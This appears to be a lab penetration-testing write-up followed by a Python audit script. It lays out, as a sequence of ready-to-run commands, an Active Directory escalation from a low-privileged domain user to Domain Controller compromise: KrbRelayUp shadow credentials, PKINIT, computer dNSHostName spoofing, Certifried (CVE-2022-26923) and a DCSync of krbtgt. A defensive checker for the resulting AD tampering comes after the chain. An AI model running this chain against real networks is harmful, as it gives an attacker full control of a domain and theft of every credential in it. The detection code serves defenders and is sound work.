This exploit path only applies when you have an interactive session on a domain-joined workstation; the privilege level of the account does not matter (a low-privileged domain user is enough).
- Obtain a certificate for the current workstation's computer account (ws01$) by relaying its Kerberos authentication to LDAP and writing shadow credentials (msDS-KeyCredentialLink) with KrbRelayUp. The relay requires that LDAP signing is not enforced on the Domain Controller.
KrbRelayUp.exe relay -m shadowcred -f
- Take the base64-encoded PFX and its password from KrbRelayUp's output and request a TGT for ws01$ with PKINIT. gettgtpkinit.py also prints the AS-REP encryption key, which the next step needs.
python3 gettgtpkinit.py 'range.net/ws01$' -pfx-base64 $(cat /tmp/ws01.b64) -pfx-pass 'yB3@sL1=fP3$' -dc-ip 192.168.86.182 /tmp/out.ccache
- Recover the NT hash of the computer account (Kerberos U2U with the PKINIT TGT). getnthash.py reads the TGT from KRB5CCNAME and needs the AS-REP key from the previous step.
export KRB5CCNAME=/tmp/out.ccache
python3 getnthash.py -key 643962c82ed3db0207d9fb3c6bf094dbe2721e12a32e7798dbd220db165926d2 -dc-ip 192.168.86.182 'range.net/ws01$'
- Clear the servicePrincipalName of the current computer account and set its dNSHostName to the Domain Controller's (dc01.range.net) with modify_computer.py. The SPNs must be cleared first: changing dNSHostName makes the DC regenerate HOST/dc01.range.net SPNs, which already exist on dc01$, so the write would otherwise fail with a constraint violation. Replace {dc-host} with the DC's hostname or IP.
python3 modify_computer.py range.net/ws01\$@{dc-host} -hashes :0e3ae07798e1bc9e02b049a795a7e69f
- Request a certificate from the Machine template with certi, authenticating as ws01$ over Kerberos. The CA builds the subject alternative name from the account's dNSHostName, so the certificate is issued for dc01.range.net, i.e. it authenticates as the Domain Controller. This is the Certifried issue (CVE-2022-26923); a CA and DC with the May 2022 patch embed the requester's objectSid in the certificate and no longer map it to dc01$. Replace {ca-host} with the CA server's hostname.
python3 certi.py req range.net/ws01\$@{ca-host} range-CA01-CA -k -n --dc-ip 192.168.86.182 -t Machine --hashes :0e3ae07798e1bc9e02b049a795a7e69f
- Authenticate as the DC with PKINIT using the certificate just issued (certi saves it as dc01$.pfx with the password admin; pass the file with -cert-pfx). Note the AS-REP key again.
python3 gettgtpkinit.py 'range.net/dc01$' -cert-pfx 'dc01$.pfx' -pfx-pass 'admin' -dc-ip 192.168.86.182 /tmp/out.ccache
- Recover the NT hash of dc01$ with the new TGT and the AS-REP key printed by gettgtpkinit.py
export KRB5CCNAME=/tmp/out.ccache
python3 getnthash.py 'range.net/dc01$' -key {as-rep-key} -dc-ip 192.168.86.182
- DCSync with the DC's computer account (it holds the replication rights) and win. Replace {dc-host} with the DC's hostname or IP.
secretsdump.py range.net/dc01\$@{dc-host} -hashes :{dc01-ntlm-hash} -just-dc -just-dc-user 'range\krbtgt'
For the steps that require a Windows workstation, refer to this gist.
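A defensive counterpart to the chain above, added here as an example and not part of the original write-up: a Python check over computer-object attributes that flags the artifacts these steps leave in Active Directory, namely msDS-KeyCredentialLink written to a workstation (the shadow credentials step), an emptied servicePrincipalName, and a dNSHostName that no longer matches the account's own name or collides with another computer's (the modify_computer.py step). The record format and the sample objects are constructed for the example, reusing the lab names from this page; in practice the dicts would be filled from an LDAP search for objectClass=computer.

```python
"""Audit computer accounts for the tampering left behind by the shadow-credential
and dNSHostName-spoofing steps above. Added example; not from the original page.

Record format (one dict per computer object) is an assumption for this example.
"""

DOMAIN = "range.net"
SERVER_TRUST_ACCOUNT = 0x2000  # userAccountControl bit set on Domain Controllers

# Constructed sample records (not real LDAP output), modelled on the lab above.
SAMPLE_COMPUTERS = [
    {   # a healthy workstation: nothing to report
        "sAMAccountName": "WS02$",
        "dNSHostName": "ws02.range.net",
        "servicePrincipalName": ["HOST/ws02.range.net", "HOST/WS02",
                                 "RestrictedKrbHost/ws02.range.net", "RestrictedKrbHost/WS02"],
        "msDS-KeyCredentialLink": [],
        "userAccountControl": 0x1000,
    },
    {   # the real DC: its dNSHostName matches its own name
        "sAMAccountName": "DC01$",
        "dNSHostName": "dc01.range.net",
        "servicePrincipalName": ["HOST/dc01.range.net", "ldap/dc01.range.net"],
        "msDS-KeyCredentialLink": [],
        "userAccountControl": SERVER_TRUST_ACCOUNT,
    },
    {   # ws01$ after KrbRelayUp shadowcred and modify_computer.py
        "sAMAccountName": "WS01$",
        "dNSHostName": "dc01.range.net",
        "servicePrincipalName": [],
        "msDS-KeyCredentialLink": ["B:828:0002000020000100...:CN=WS01,CN=Computers,DC=range,DC=net"],
        "userAccountControl": 0x1000,
    },
]


def expected_dns_host_name(sam_account_name: str, domain: str = DOMAIN) -> str:
    """WS01$ -> ws01.range.net, the value the DC sets when the machine joins."""
    return f"{sam_account_name.rstrip('$').lower()}.{domain.lower()}"


def audit_computer(obj: dict, domain: str = DOMAIN) -> list:
    """Per-object checks; returns a list of finding strings (empty if clean)."""
    findings = []
    sam = obj["sAMAccountName"]
    dns = (obj.get("dNSHostName") or "").lower()
    # dNSHostName is what the CA puts in the SAN of a Machine certificate.
    if dns and dns != expected_dns_host_name(sam, domain):
        findings.append(f"{sam}: dNSHostName {dns!r} does not match the account name")
    # Attackers clear SPNs so the dNSHostName write is accepted by the DC.
    if not obj.get("servicePrincipalName"):
        findings.append(f"{sam}: servicePrincipalName is empty")
    # Shadow credentials live in msDS-KeyCredentialLink.
    if obj.get("msDS-KeyCredentialLink") and not (obj.get("userAccountControl", 0) & SERVER_TRUST_ACCOUNT):
        findings.append(f"{sam}: msDS-KeyCredentialLink is set on a non-DC computer account")
    return findings


def audit_all(objs, domain: str = DOMAIN) -> dict:
    """Run per-object checks plus a cross-object check for shared dNSHostName values."""
    findings = {o["sAMAccountName"]: audit_computer(o, domain) for o in objs}
    owners_by_dns = {}
    for o in objs:
        dns = (o.get("dNSHostName") or "").lower()
        if dns:
            owners_by_dns.setdefault(dns, []).append(o["sAMAccountName"])
    for dns, owners in owners_by_dns.items():
        if len(owners) > 1:
            for sam in owners:
                others = ", ".join(s for s in owners if s != sam)
                findings[sam].append(f"{sam}: dNSHostName {dns!r} is also claimed by {others}")
    return {sam: f for sam, f in findings.items() if f}


if __name__ == "__main__":
    for sam, flist in audit_all(SAMPLE_COMPUTERS).items():
        for line in flist:
            print(line)
```

On the sample data only WS01$ (four findings) and DC01$ (one, the shared dNSHostName) are reported. Treat msDS-KeyCredentialLink alone as a lead rather than proof: hybrid Azure AD joined devices legitimately carry a key credential on their computer object, whereas an emptied SPN list or a dNSHostName pointing at another host is never normal. In the security log, event 4742 (computer account changed) showing a DNS Host Name or Service Principal Names change on a workstation is the matching signal for the modify_computer.py step.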